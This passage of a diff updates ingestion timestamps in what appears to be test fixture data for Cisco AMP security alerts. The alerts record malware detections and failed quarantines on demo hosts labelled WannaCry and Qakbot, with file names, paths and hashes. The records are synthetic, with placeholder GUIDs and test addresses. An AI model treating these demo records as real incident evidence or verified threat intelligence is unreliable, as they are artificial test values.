Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -5032,7 +5032,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764345400Z",
+ "ingested": "2021-12-14T14:40:45.520881076Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -5110,7 +5110,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:39.764350700Z",
+ "ingested": "2021-12-14T14:40:45.520881486Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
 "code": "553648143",
 "kind": "alert",
@@ -5182,7 +5182,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764356Z",
+ "ingested": "2021-12-14T14:40:45.520881891Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
 "code": "2164260893",
 "kind": "alert",
@@ -5258,7 +5258,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764377900Z",
+ "ingested": "2021-12-14T14:40:45.520882284Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
 "code": "2164260893",
 "kind": "alert",
@@ -5334,7 +5334,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:35:39.764381800Z",
+ "ingested": "2021-12-14T14:40:45.520882789Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
 "code": "553648155",
 "kind": "alert",
@@ -5412,7 +5412,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764387200Z", + "ingested": "2021-12-14T14:40:45.520883282Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", 
@@ -5492,7 +5492,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764393100Z", + "ingested": "2021-12-14T14:40:45.520883738Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", 
@@ -5576,7 +5576,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.764398700Z", + "ingested": "2021-12-14T14:40:45.520884149Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "code": "553648147", "kind": "alert", 
@@ -5650,7 +5650,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764405100Z", + "ingested": "2021-12-14T14:40:45.520884898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -5726,7 +5726,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764410300Z", + "ingested": "2021-12-14T14:40:45.520885291Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -5802,7 +5802,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764416200Z", + "ingested": "2021-12-14T14:40:45.520885681Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -5878,7 +5878,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764425100Z", + "ingested": "2021-12-14T14:40:45.520886073Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -5954,7 +5954,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764429400Z", + "ingested": "2021-12-14T14:40:45.520886467Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6030,7 +6030,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764433400Z", + "ingested": "2021-12-14T14:40:45.520886977Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6106,7 +6106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764438300Z", + "ingested": "2021-12-14T14:40:45.520887383Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6182,7 +6182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764443200Z", + "ingested": "2021-12-14T14:40:45.520887777Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -6258,7 +6258,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764448500Z", + "ingested": "2021-12-14T14:40:45.520888173Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 